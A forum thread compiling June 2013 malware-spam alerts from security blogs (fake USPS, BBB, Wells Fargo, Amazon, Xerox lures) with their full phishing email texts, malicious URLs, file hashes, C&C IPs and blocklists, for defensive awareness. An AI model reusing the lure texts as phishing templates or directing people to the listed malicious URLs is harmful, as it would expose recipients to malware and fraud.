If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
Label/Receipt Number: 861337597092
Expected Delivery Date: Jun 6, 2013
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Thank you,
© 2013 Copyright© 2013 USPS. All Rights Reserved.
*** This is an automatically generated email, please do not reply ...
There is an attachment called USPS_Label_861337597092.zip which in turn contains a malicious executable file USPS_Label_06062013.exe (note the date is encoded into the filename). VirusTotal results for this are 18/47*. The Comodo CAMAS report** shows an attempt to download more components from michaelscigarbar .net on 184.95.37.109 (Jolly Works Hosting, Philippines.. rented from Secured Servers in the US). URLquery shows a very large amount of malware activity on that IP, mostly apparently running on legitimate -hacked- domains. You should probably treat all of the following domains as hostile:
alliancelittleaviators .com
apparelacademy .com
apparelacademy .net
brokerforcolorado .com
carlaellisproperties .com
dragoncigars .net
heavenlycigars .net
libertychristianstore .com
michaelscigarbar .com
michaelscigarbar .net
michaelscigars .net
montverdestore .com
montverdestore .net
montverdestore .org ..."
* https://www.virustotal.com/en/file/876e82910a2da4ccc4fc861b35f6b3bea9b09219657a2da3cfb2b4cf553ab695/analysis/1370549956/
File name: USPS_Label_06062013.exe
Detection ratio: 18/47
Analysis date: 2013-06-06
** http://camas.comodo.com/cgi-bin/submit?file=876e82910a2da4ccc4fc861b35f6b3bea9b09219657a2da3cfb2b4cf553ab695
*** http://urlquery.net/search.php?q=184.95.37.109&type=string&start=2013-05-22&end=2013-06-06&max=50
___
Better Business Bureau Compliant Spam
- http://threattrack.tumblr.com/post/52376899345/better-business-bureau-compliant-spam
7 June 2013 - "Subjects Seen:
BBB Appeal [removed]
Typical e-mail details:
The Better Business Bureau has been booked the above mentioned grievance from one of your users in respect to their dealings with you. The detailed description of the consumer’s trouble are available for review at a link below. Please give attention to this matter and notify us about your sight as soon as possible.
We graciously ask you to overview the CLAIM REPORT to answer on this plaint.
We awaits to your prompt answer.
WBR
Ryan Myers
Dispute Advisor
Malicious URLs
amapi .com .br/bbb.html
pnpnews .net/news/readers-sections.php?hvv=rvjzzloo&jnjpe=thpe
pnpnews .net/news/readers-sections.php?yf=1i:1f:32:33:2v&re=1n:2w:1n:1g:30:1f:1o:1n:1i:2v&u=1f&br=b&sd=c&jopa=5698723
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ce72a2134c909b412e923b4b30385da6/tumblr_inline_mo0xyvrpWf1qz4rgp.png
- http://blog.dynamoo.com/2013/06/bbb-spam-pnpnewsnet.html
7 June 2013 - "This fake BBB spam leads to malware on pnpnews .net:
From: Better Business Bureau [mailto:standoffzwk68 @clients.bbb .com]
Sent: 07 June 2013 15:08
Subject: BBB information regarding your customer's pretension No. 00167486
Better Business Bureau ©
Start With Trust ©
Fri, 7 Jun 2013
RE: Complaint No. 00167486
[redacted]
The Better Business Bureau has been entered the above said grievance from one of your users in regard to their business relations with you. The information about the consumer's trouble are available visiting a link below. Please pay attention to this matter and notify us about your sight as soon as possible.
We kindly ask you to overview the CLAIM LETTER REPORT to meet on this claim.
We awaits to your prompt answer.
Faithfully yours
Jonathan Edwards
Dispute Advisor
Better Business Bureau ...
Screenshot: https://lh3.ggpht.com/-RY4L1o2A9_w/UbHwqENyOxI/AAAAAAAABQw/IgMGesJmdiQ/s400/bbb.png
The link in the email goes through a legitimate hacked site and then to a payload at [donotclick]pnpnews .net/news/readers-sections.php (report here*) hosted on:
46.18.160.86 - Saudi Electronic Info Exchange Company (Tabadul) JSC
93.89.235.13 - FBS Bilisim Cozumleri, Cyprus
178.16.216.66 - Gabrielson Invest AB, Sweden
186.215.126.52 - Global Village Telecom, Brazil
190.93.23.10 - Greendot, Trinidad and Tobago
Blocklist:
46.18.160.86
93.89.235.13
178.16.216.66
186.215.126.52
190.93.23.10 ..."
* http://urlquery.net/report.php?id=2944992
... Detected BlackHole v2.0 exploit kit URL pattern ...
___
Fake American Express PAYVE Remit Spam
- http://threattrack.tumblr.com/post/52383728966/american-express-payve-remit-spam
June 7, 2013 - "Subjects Seen:
PAYVE - Remit file
Typical e-mail details:
A payment(s) to your company has been processed through the American Express Payment Network.
The remittance details for the payment(s) are attached ([removed].zip).
- The remittance file contains invoice information passed by your buyer. Please contact your buyer for additional information not available in the file.
- The funds associated with this payment will be deposited into your bank account according to the terms of your American Express merchant agreement and may be combined with other American Express deposits. For additional information about Deposits, Fees, or your American Express merchant agreement:
Contact American Express Merchant Services at 1-800-528-0933 Monday to Friday, 8:00 AM to 8:00 PM ET.
- You can also view PAYVE payment and invoice level details using My Merchant Account/Online Merchant Services. If you are not enrolled in My Merchant Account/OMS, you can do so at americanexpress .com/mymerchantaccount or call us at 1-866-220-7374, Monday - Friday between 9:00 AM-7:30 PM ET, and we’ll be glad to help you.
For quick and easy enrollment, please have your American Express Merchant Number, bank account ABA (routing number) and DDA (account number) on hand.
This customer service e-mail was sent to you by American Express. You may receive customer service e-mails even if you have unsubscribed from marketing e-mails from American Express...
Malicious URLs
storeyourbox .net/ponyb/gate.php
storeyourthings .net/ponyb/gate.php
drjoycethomasderm .com/ponyb/gate.php
errezeta .biz/ToSN79T.exe
190.147.81.28 /yqRSQ.exe
207.204.5.170 /PXVYGJx.exe
archeting .it/86zP.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/567fce768b7d6ce4026f49571595ee72/tumblr_inline_mo14hjPc6a1qz4rgp.png
- http://blog.dynamoo.com/2013/06/payve-remit-file-spam.html
7 June 2013 - "This fake American Express Payment Network spam has a malicious attachment.
Date: Fri, 7 Jun 2013 20:41:25 +0600 [10:41:25 EDT]
From: "PAYVESUPPORT @AEXP .COM" [PAYVESUPPORT @AEXP .COM]
Subject: PAYVE - Remit file ...
Attached to the email is an archive file called CD0607213.389710762910.zip which in turn contains an executable named CD06072013.239871839.exe (note that the date is included in the filename). Virustotal reports that just 8/46* anti-virus scanners detect it.
The Comodo CAMAS report*** gives some details about the malware, including the following checksums:
MD5 fd18576bd4cf1baa8178ff4a2bef0849
SHA1 8b8ba943393e52a3972c11603c3f1aa1fc053788
SHA256 f31ca8a9d429e98160183267eea67dd3a6e592757e045b2c35bb33d5e27d6875
The malware attempts to download further components from storeyourbox .com on 97.107.137.239 (Linode, US) which looks like a legitimate server that has been -badly- compromised**. The following domains appear to be on the server, I would advise that they are all dangerous at the moment:
drjoycethomasderm .com
goodvaluemove .com
jacksonmoving .com
jacksonmoving .net
napervillie-movers .com
reebie .net
storageandmoving .net
storeyourbox .com
storeyourbox .net
storeyourthings .net "
* https://www.virustotal.com/en/file/f31ca8a9d429e98160183267eea67dd3a6e592757e045b2c35bb33d5e27d6875/analysis/1370627576/
File name: CD06072013.239871839.exe
Detection ratio: 8/46
Analysis date: 2013-06-07
** https://www.virustotal.com/en/ip-address/97.107.137.239/information/
*** http://camas.comodo.com/cgi-bin/submit?file=f31ca8a9d429e98160183267eea67dd3a6e592757e045b2c35bb33d5e27d6875
:fear: :mad:
AplusWebMaster
2013-06-10, 22:52
FYI...
Fake Wells Fargo - attachment Spam
- http://threattrack.tumblr.com/post/52635380368/wells-fargo-important-document-attachment-spam
June 19, 2013 - "Subjects Seen:
IMPORTANT - WellsFargo
Typical e-mail details:
Please check attached documents.
Michael_Kane
Wells Fargo Advisors
817-563-5247 office
817-368-5170 cell [removed]
ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.
To unsubscribe from marketing e-mails from:
· An individual Wells Fargo Advisors financial advisor: Reply to one of his/her e-mails and type “Unsubscribe” in the subject line.
· Wells Fargo and its affiliates: Unsubscribe at wellsfargoadvisors.com/unsubscribe.
Neither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit wellsfargoadvisors.com/disclosures/email-disclosure.html .
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103
Malicious URLs
megmcenery .com/ponyb/gate.php
mceneryfinancial .com/ponyb/gate.php
margueritemcenery .com/ponyb/gate.php
hraforbiz. com/ponyb/gate.php
ftp(DOT)impactdata .com/da4.exe
errezeta .biz/ToSN79T.exe
ftp(DOT)myfxpips .com/PMLyQRMt.exe
207.204.5.170 /PXVYGJx.exe
Malicious File Name and MD5:
WellsFargo.<random>.zip (05c33cfcf22c5736C4a162f6d7c2eeac)
Important WellsFargo Docs.exe (47e739106c24fbf52ed3b8fd01dc3668)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c2d7ca54263a0eb6d977f5ac9ab77207/tumblr_inline_mo6s1hL1ca1qz4rgp.png
- http://blog.dynamoo.com/2013/06/wells-fargo-spam-important-wellsfargo.html
10 June 2013 - "This fake Wells Fargo spam run comes with one of two malicious attachments:
Date: Mon, 10 Jun 2013 13:00:13 -0500 [14:00:13 EDT]
From: Anthony_Starr @wellsfargo .com
Subject: IMPORTANT - WellsFargo
Please check attached documents.
Anthony_Starr
Wells Fargo Advisors
817-563-9816 office
817-368-5471 cell Anthony_Starr @ wellsfargo .com
ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.
To unsubscribe from marketing e-mails from:
· An individual Wells Fargo Advisors financial advisor: Reply to one of his/her
e-mails and type “Unsubscribe” in the subject line.
· Wells Fargo and its affiliates: Unsubscribe at
www .wellsfargoadvisors .com/unsubscribe. Neither of these actions will affect delivery of
important service messages regarding your accounts that we may need to send you or
preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit
http :// wellsfargoadvisors .com/disclosures/email-disclosure.html .
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...
There is a ZIP file attached to the email message, and the spammers have attempted to name the attachment after the recipient.. but because the spam has multiple recipients it may end up with a random name. Inside the ZIP file is an EXE file, and there appear to be -two- variants.
One is called Important WellsFargo Doc.exe and it has a pretty shocking VirusTotal detection rate of 0/47* (yup.. none at all). The Comodo CAMAS report** gives the following checksums..
Name Value
Size 94720
MD5 70e604777a66980bcc751dcb00eafee5
SHA1 52ef61b6296f21a3e14ae35320654ffe3f4e769d
SHA256 f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae
..it identifies that this version of the malware attempts to download additional components from mceneryfinancial .com on 173.255.213.171 (specifically it is a pony downloader querying /ponyb/gate.php)... ThreatTrack has a more detailed report*** which also identifies callbacks to www.errezeta .biz and ftp.myfxpips .com. ThreatExpert has a slightly different report (1) and further identifies megmcenery .com, taxfreeincomenow .com, taxfreeincomenow .info and 207.204.5.170 (Linode, US). The second version has a similarly named files called Important WellsFargo Docs.exe (plural) with a higher VirusTotal detection rate of 11/46 (2). Comodo CAMAS reports(3) the following file characteristics..
Name Value
Size 114176
MD5 47e739106c24fbf52ed3b8fd01dc3668
SHA1 b85b4295d23c912f9446a81fd605576803a29e53
SHA256 2d0d16d29ceca912d529533aa850f1e1539f4b509ea7cb89b8839f672afb418b
..in this case the pony download contacts hraforbiz .com (also on 173.255.213.171). Other analyses are pending. Several of these malware domains are hosted on 173.255.213.171 (Linode, US) and we can assume that this server is compromised along with all the domains on it. 62.149.131.162 (Aruba, Italy) also seems to be compromised(4). 173.254.68.134 (5) (Unified Layer, US) and 207.204.5.170 (6) (Register .com, US) appear to be compromised in some way to. Of note is the fact that almost all of these domains appear to be legitimate but have been -hacked- in some way, I would expect them to be cleaned up at some point in the future. Putting all these IPs and domains together gives a recommended blocklist:
173.254.68.134
173.255.213.171
207.204.5.170
62.149.131.162 ..."
(More listed at the dynamoo URL above.)
* https://www.virustotal.com/en/file/f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae/analysis/1370888138/
File name: Important WellsFargo Doc.exe
Detection ratio: 0/47
Analysis date: 2013-06-10
** http://camas.comodo.com/cgi-bin/submit?file=f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae
*** http://www.dynamoo.com/files/analysis_31139_70e604777a66980bcc751dcb00eafee5.pdf
1) http://www.threatexpert.com/report.aspx?md5=70e604777a66980bcc751dcb00eafee5
2) https://www.virustotal.com/en/file/2d0d16d29ceca912d529533aa850f1e1539f4b509ea7cb89b8839f672afb418b/analysis/1370888252/
File name: Important WellsFargo Docs.exe
Detection ratio: 11/46
Analysis date: 2013-06-10
3) http://camas.comodo.com/cgi-bin/submit?file=f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae
4) https://www.virustotal.com/en/ip-address/62.149.131.162/information/
5) https://www.virustotal.com/en/ip-address/173.254.68.134/information/
6) https://www.virustotal.com/en/ip-address/207.204.5.170/information/
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
E-mail Messages with Malicious Attachments - 2013 Jun 10
Fake Deposit Transfer Confirmation Notification E-mail Messages - 2013 Jun 10
Fake Documents Attachment Email Messages - 2013 Jun 10
Malicious Attachment Email Messages - 2013 Jun 10
Fake Bill Payment Notification Email Messages - 2013 Jun 10
Fake Legal Assistance Inquiry E-mail Messages - 2013 Jun 10
Fake Products Advertisement E-mail Messages - 2013 Jun 10
Fake FedEx Shipment Notification E-mail Messages - 2013 Jun 10
Fake Xerox Scan Attachment Email Messages - 2013 Jun 10
Fake Gift Voucher Redemption Email Messages - 2013 Jun 10
Fake Deposit Statement Notification E-mail Messages - 2013 Jun 10
(More detail and links at the cisco URL above.)
:fear::fear::mad:
AplusWebMaster
2013-06-11, 16:59
FYI...
Fake Fax Transmission emails lead to malware
- http://blog.webroot.com/2013/06/11/fake-unsuccessful-fax-transmission-themed-emails-lead-to-malware/
June 11, 2013 - "Have you sent an eFax recently? Watch out for an ongoing malicious spam campaign that tries to convince you that there’s been an unsuccessful fax transmission. Once socially engineered users execute the malicious attachment found in the fake emails, their PCs automatically join the botnet of the cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/06/fake_bogus_email_spam_efax_unsuccessful_fax_transmission_malware_malicious_software_social_engineering.png
Detection rate for the malicious attachment: MD5: 66140a32d7d8047ea93de0a4a419880b * ... UDS:DangerousObject.Multi.Generic... phones back to the following C&C server hxxp ://lukafalls .com/banners/index.php – 95.154.254.17, as well as to the following C&C IPs:
95.154.254.17, 190.179.212.30, 65.92.129.196, 125.25.82.22, 69.235.15.127, 108.215.44.142, 188.153.47.135, 76.226.112.216, 78.100.36.98, 190.162.42.76, 78.99.110.225, 118.101.184.54, 90.156.118.144, 212.182.121.226, 99.97.73.189, 181.67.50.91, 2.87.2.21, 108.215.99.94, 84.59.222.81, 142.136.161.103, 178.203.226.84, 95.234.169.221, 217.41.0.85, 71.143.224.43, 74.139.10.100, 78.38.40.207, 213.215.153.212 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/676fd873be5b1fbe322947b350635067adc5fe9b35a4a674341e517e79222f68/analysis/
File name: Fax details and transmission_report.doc.exe
Detection ratio: 31/47
Analysis date: 2013-06-10
___
Self-propagating ZBOT malware ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/going-solo-self-propagating-zbot-malware-spotted/
June 10, 2013 - "... we have spotted a new ZBOT variant that can spread on its own. This particular ZBOT variant arrives through a malicious PDF file disguised as a sales invoice document. If the user opens this file using Adobe Reader, it triggers an exploit which causes the following pop-up window to appear:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/zbot1.jpg
... error message upon execution of the malicious PDF file
While this is going on, the malicious ZBOT variant – WORM_ZBOT.GJ – is dropped onto the system and run. It is here that several differences start to appear. First of all, WORM_ZBOT.GJ has an autoupdate routine: it can download and run an updated copy of itself. Secondly, however, it can spread onto other systems via removable drives, like USB thumb drives. It does thus by searching for removable drives and then creating a hidden folder with a copy of itself inside this folder, and a shortcut pointing to the hidden ZBOT copy.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/worm-zbot-BD-JPEG.jpg
... Portion of WORM_ZBOT.GJ code creating copy of itself
This kind of propagation by ZBOT is unusual... ZBOT malware is usually distributed by exploit kits and/or malicious attachments..."
- https://net-security.org/malware_news.php?id=2515
June 11, 2013 - "The Zeus / Zbot Trojan has been around since 2007, and it and its variants continued to perform MitM attacks, log keystrokes and grab information entered in online forms. It is usually spread via exploit kits (drive-by-downloads), phishing schemes, and social media..."
___
Washington Free Beacon compromised to serve up Malware
- http://www.invincea.com/2013/06/kia-the-washington-free-beacon-compromised-to-serve-up-malware/
UPDATE 10:02 a.m. 6/11 – "Repeated attempts to reach the Beacon have been unsuccessful. We have not seen reinfection in subsequent visits but it is hard to know without navigating every page...
WARNING: Do NOT browse to freebeacon[.]com until further notice, as the site is still actively redirecting user traffic to malware. The Washington Free Beacon has been notified but have not confirmed nor responded... an article from The Washington Free Beacon on the breaking NSA Leaks story (freebeacon[.]com/nsa-leaker-surfaces-in-hong-kong/) linked to by the Drudge report has been compromising readers with a Java-based exploit kit* ... patching Java to the latest version (if you can) may be your only (temporary) protection..."
- http://www.invincea.com/wp-content/uploads/27.png
(More detail at the invincea URL above.)
* https://www.virustotal.com/en/file/bb5a8c01ff502c8ad8942f16c487f02ddae69df686e78974d99921e03de82252/analysis/1370873028/
File name: 1.jar
Detection ratio: 3/47
Analysis date: 2013-06-10
___
Something evil on 173.255.213.171
- http://blog.dynamoo.com/2013/06/something-evil-on-173255213171.html
11 June 2013 - "As a follow-up to this post*, the exploit server on 173.255.213.171 (Linode, US) is hosting a number of -hijacked- GoDaddy-registered domains that are serving an exploit kit [1] [2]... block 173.255.213.171 ..."
* http://blog.dynamoo.com/2013/06/wells-fargo-spam-important-wellsfargo.html
1) https://www.virustotal.com/en/ip-address/173.255.213.171/information/
2) http://urlquery.net/search.php?q=173.255.213.171&type=string&start=2013-05-27&end=2013-06-11&max=50
___
CitiBank Secure Message Spam
- http://threattrack.tumblr.com/post/52714672175/citibank-secure-message-spam
June 11, 2013 - "Subjects Seen:
(SECURE)Electronic Account Statement [removed]
Typical e-mail details:
You have received a Secure PDF message from the CitiSecure Messaging Server.
Open the PDF file attached to this notification. When prompted, enter your Secure PDF password to view the message contents.
To reply to this message in a secure manner, it is important that you use the Reply link inside the Secure PDF file. This will ensure that any confidential information is sent back securely to the sender.
Help is available 24 hours a day by calling 1-866-535-2504 or 1-904-954-6181 or by email at secure.emailhelp @citi .com
Please note: Adobe Reader version 7 or above is required to view all SecurePDF messages.
Malicious URLs
chriscarlson .com/ponyb/gate.php
chrisandannwedding .com/ponyb/gate.php
ccrtl .com/ponyb/gate.php
chrisandannwedding .com/ponyb/gate.php
hoteloperaroma .it/Sb9A7JV1.exe
stitaly .net/E2KYVJD.exe
newmountolivet .org/iUHgGvn.exe
mozzarellabroker .com/pZYTn.exe
Malicious File Name and MD5:
Secure.<random>.zip (05c33cfcf22c5736C4a162f6d7c2eeac)
secure.pdf.exe (4209430a3393287d5e28def88e43b93b)
ThreatAnalyzer Report: http://db.tt/RtlUb5Vs [PDF]
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c2580fcc770c2b3ec8b2b809b4e19620/tumblr_inline_mo8kobS8e01qz4rgp.png
___
Amazon Order Notification Spam
- http://threattrack.tumblr.com/post/52735974435/amazon-order-notification-spam
June 11, 2013 - "Subjects Seen:
Payment for Your Amazon Order # [removed]
Typical e-mail details:
We’re writing to let you know that we are having difficulty processing your payment for the above transaction. To protect your security and privacy, your issuing bank cannot provide us with
information regarding why your credit card was declined.
However, we suggest that you double-check the billing address, expiration date and cardholder name
that you entered; if entered incorrectly these will sometimes cause a card to decline. There is no
need to place a new order as we will automatically try your credit card again.
There are a few steps you can take to make the process faster:
1. Verify the payment information for this order is correct (expiration date, billing address, etc).
You can update your account and billing information at :
amazon .com/gp/css/summary/edit.html?ie=UTF8&orderID=[removed]
2. Contact your issuing bank using the number on the back of your card to learn more about their
policies. Some issuers put restrictions on using credit cards for electronic or internet
purchases. Please have the exact dollar amount and details of this purchase when you call the
bank. If paying by credit card is not an option, buy Amazon.com Gift Card claim codes with cash
from authorized resellers at a store near you. Visit amazon.com/cashgcresellers to learn
more.
Thank you for shopping at Amazon.com. Sincerely, Amazon.com Customer Service
Malicious URLs
gnqlawyers .com/proteans/index.html
eucert .com/herein/index.html
gauravvashisht .com/desisted/index.html
goldcoinvault .com/news/pictures_hints_causes.php
sweethomesorrento .it/t0q.exe
server1.extra-web .cz/fdCtJM.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4e9fe3a8ecdad467f2a458919e0e8d24/tumblr_inline_mo8z4f3ZjB1qz4rgp.png
- http://blog.dynamoo.com/2013/06/amazoncom-spam-goldcoinvaultcom.html
June 11, 2013 - "This fake Amazon.com spam leads to malware on goldcoinvault .com:
Date: Tue, 11 Jun 2013 14:25:21 -0600 [16:25:21 EDT]
From: "Amazon.com Customer Care Service" [payments-update @amazon .com]
Subject: Payment for Your Amazon Order # 104-884-8180383
Regarding Your Amazon.com Order
Order Placed: June 11, 2013
Amazon.com order number: 104-884-8180383
Order Total: $2761.86 ...
The link in the email goes through a legitimate hacked site to an intermediate page with the following redirectors:
[donotclick]ftp.blacktiedjent .com/mechanic/vaccinated.js
[donotclick]piratescoveoysterbar .com/piggybacks/rejoiced.js
[donotclick]nteshop .es/tsingtao/flanneling.js
..from there it hits the main malware payload site at [donotclick]goldcoinvault .com/news/pictures_hints_causes.php (report here*) hosted on goldcoinvault .com which is a hacked GoDaddy domain -hijacked- to point at 173.255.213.171 (Linode, US). This same server is very active and has been spotted here** and here***, also using hacked GoDaddy domains, but right at the moment the malware page appears to be 403ing which is good..."
* http://urlquery.net/report.php?id=3054553
** http://blog.dynamoo.com/2013/06/something-evil-on-173255213171.html
*** http://blog.dynamoo.com/2013/06/wells-fargo-spam-important-wellsfargo.html
:fear::fear: :mad:
AplusWebMaster
2013-06-12, 15:56
FYI...
Casino PUA software SPAM ...
- http://blog.webroot.com/2013/06/12/tens-of-thousands-of-spamvertised-emails-lead-to-w32casonline/
June 12, 2013 - "Fraudsters are currently spamvertising tens of thousands of emails enticing users into installing rogue, potentially unwanted (PUAs) casino software. Most commonly known as W32/Casonline, this scam earns revenue through the rogue online gambling software’s affiliate network... (multiple screenshots at the URL above)... Spamvertised URLs:
hxxp ://luckynuggetcasino .com – 67.211.111.163
hxxp ://888casino .com – 213.52.252.59
hxxp ://spinpalace.com – 109.202.114.65
hxxp ://alljackpotscasino.com – 64.34.230.122
hxxp ://allslotscasino.com – 64.34.230.149
... (multiple) MD5s... have also phoned back to the same IP (213.52.252.59)... (Low detection rates per Virustotal - links at the webroot URL above)...
We advise users to avoid interacting with any kind of content distributed through spam messages, especially clicking on any of the links found in such emails...."
___
Fake BBB SPAM / trleaart .net
- http://blog.dynamoo.com/2013/06/bbb-spam-trleaartnet.html
12 June 2013 - "This fake BBB spam with a "PLAINT REPORT" (sic) leads to malware on trleaart .net:
From: Better Business Bureau [mailto:rivuletsjb72 @bbbemail .org]
Sent: 11 June 2013 18:04
Subject: Better Business Beareau Complaint ¹ S3452568
Importance: High
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust
Tue , 11 Jun 2013
Issue N. S3452568
The Better Business Bureau has been booked the above said claim letter from one of your customers in respect of their dealings with you. The detailed description of the consumer's trouble are available visiting a link below. Please pay attention to this matter and inform us about your mind as soon as possible.
We amiably ask you to open the PLAINT REPORT to answer on this claim.
We awaits to your prompt response.
Faithfully yours
Daniel Cox
Dispute Advisor...
Better Business Bureau...
Screenshot: https://lh3.ggpht.com/-ZaIrOeD1dnc/Ubg75F2bnoI/AAAAAAAABRQ/EM7rW99Jkac/s400/bbb2.png
The link goes through a legitimate -hacked- site and end up with a malware landing page on [donotclick]trleaart .net/news/members_guarantee.php (report here*) hosted on the following IPs:
160.75.169.49 (Istanbul Technical University, Turkey)
186.215.126.52 (Global Village Telecom, Brazil)
190.93.23.10 (Greendot, Trinidad and Tobago)
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
This network of evil sites is rather large... in the meantime here is a partial blocklist:
160.75.169.49
186.215.126.52
190.93.23.10
193.254.231.51 ..."
* http://urlquery.net/report.php?id=3067317
___
Malware sites to block 12/6/13
- http://blog.dynamoo.com/2013/06/malware-sites-to-block-12613.html
12 June 2013 - "This is a refresh of this list of domains and IPs controlled by what I call the "Amerika" gang, and it follows on from this BBB spam run earlier. Note that IPs included in this list show recent malicious activity, but it could be that they have now been fixed. I also noticed that a couple of the domains may have been sinkholed, but it will do you no harm to block them anyway..."
(LONG list at the dynamoo URL above - includes "Plain IPlist for copy-and-pasting".)
___
Fake "Activation Needed" emails...
- http://security.intuit.com/alert.php?a=82
6/11/13 - "People are receiving -fake- emails with the title "Important Activation Needed/"
Below is a copy of part of the email people are receiving:
Screenshot: http://security.intuit.com/images/importact.jpg
... This is the end of the -fake- email.
Steps to Take Now
Do not open the attachment in the email...
Delete the email..."
___
GAMARUE malware uses Sourceforge to host files
- http://blog.trendmicro.com/trendlabs-security-intelligence/gamarue-uses-sourceforge-to-host-files/
June 11, 2013 - "In our monitoring of the GAMARUE malware family, we found a variant that used the online code repository SourceForge to host malicious files... SourceForge is a leading code repository for many open-source projects, which gives developers a free site that allows them to host and manage their projects online. It is currently home to more than 324,000 projects and serves more than 4 million downloads a day... GAMARUE malware poses a serious risk to users; attackers are able to gain complete control of a system and use it to launch attacks on other systems, as well as stealing information. Among the most common ways it reaches user systems are: infected removable drives, or the user has visited sites compromised with the Blackhole Exploit Kit. This attack is made up of four files. The first is a shortcut, which appears to be a shortcut to an external drive. (This is detected as LNK_GAMARUE.RMA.) Instead of a drive, however, it points to a .COM file (detected as TROJ_GAMARUE.LMG)...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/gamaruediagram.png
GAMARUE Infection Chain
Once the executable file is decrypted, it downloads updates to itself, as well as malicious files from a SourceForge project. In effect, it uses SourceForge to unwittingly host malicious files... The malicious files in the above example were hosted under the tradingfiles project. The same user created two more projects that were also used to host malicious GAMARUE files: ldjfdkladf and stanteam. New files were uploaded in these projects from June 1 onwards..."
- https://net-security.org/malware_news.php?id=2517
June 12, 2013 - "... the infection with a variant of the information-stealing Gamarue starts with a shortcut file to an external file, and ends with malicious files being downloaded from one of three (obviously bogus) Sourceforge projects: "tradingfiles," "stanteam," and "ldjfdkladf". The first two have already been deleted, and the third one emptied of all files. The account of the user who created them has been deleted (whether or not by Sourceforge or the user it's impossible to tell), but according to the researchers new files were uploaded into these projects from June 1 onwards..."
___
Fake Xerox WorkCentre Spam
- http://threattrack.tumblr.com/post/52796249184/xerox-workcentre-spam
June 12, 2013 - "Subjects Seen:
Scan from a Xerox WorkCentre
Typical e-mail details:
Please download the document. It was scanned and sent to you using a Xerox multifunction device.
File Type: pdf
Download: Scanned from a Xerox multi~3.pdf
multifunction device Location: machine location not set
Device Name: Xerox6592
For more information on Xerox products and solutions, please visit xerox .com
Malicious URLs
forum.xcpus .com:8080/webstats/counter.php
buildmybarwebsite .com/webstats/counter.php
continentalfuel .com/webstats/counter.php
apparellogisticsgroup .net/Aq70QrZ.exe
ftp(DOT)celebritynetworks .com/dNYC.exe
portal.wroctv .com/inZGwEH.exe
videotre .tv .it/UmQ.exe
Malicious File Name and MD5:
Scan_<random>.zip (0375c95289fc0e2dd94b63c105c24373)
Scan_<random> (8fcba93b00dba3d182b1228b529d3c9e)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37b720f293e37a73fd8edc4be4883843/tumblr_inline_moag33uzKT1qz4rgp.png
- http://blog.dynamoo.com/2013/06/scan-from-xerox-workcentre-spam.html
12 June 2013 - "This fake Xerox WorkCentre spam comes with a malicious attachment and appears to come from the victim's own domain:
Date: Wed, 12 Jun 2013 10:36:16 -0500 [11:36:16 EDT]
From: Xerox WorkCentre [Xerox.Device9@victimdomain.com]
Subject: Scan from a Xerox WorkCentre
Please download the document. It was scanned and sent to you using a Xerox multifunction device.
File Type: pdf
Download: Scanned from a Xerox multi~3.pdf
multifunction device Location: machine location not set
Device Name: Xerox2023
For more information on Xerox products and solutions, please visit http ://www.xerox .com
Attached is a ZIP file, in this case called Scan_06122013_29911.zip which in turn contains an executable Scan_06122013_29911.exe. Note that the date is encoded into the filename so future versions will be different. VirusTotal results are 23/47* which is typically patchy. Comodo CAMAS reports** that the malware attempts to phone home to forum.xcpus .com on 71.19.227.135 and has the following checksums:
MD5 8fcba93b00dba3d182b1228b529d3c9e
SHA1 54f02f3f1d6954f98e14a9cee62787387e5b072c
SHA256 544c08f288b1102d6304e9bf3fb352a8fdfb59df93dc4ecc0f753dd30e39da0c
... the ThreatTrack report [pdf]*** is more detailed and also identifies the following domains and IPs which are probably worth blocking or looking out for:
71.19.227.135
205.178.152.164
198.173.244.62
204.8.121.24
195.110.124.133
173.246.106.150 ..."
* https://www.virustotal.com/en/file/544c08f288b1102d6304e9bf3fb352a8fdfb59df93dc4ecc0f753dd30e39da0c/analysis/1371077066/
File name: Scan_06122013_29911.exe
Detection ratio: 23/47
Analysis date: 2013-06-12
** http://camas.comodo.com/cgi-bin/submit?file=544c08f288b1102d6304e9bf3fb352a8fdfb59df93dc4ecc0f753dd30e39da0c
*** http://www.dynamoo.com/files/analysis_31187_8fcba93b00dba3d182b1228b529d3c9e.pdf
___
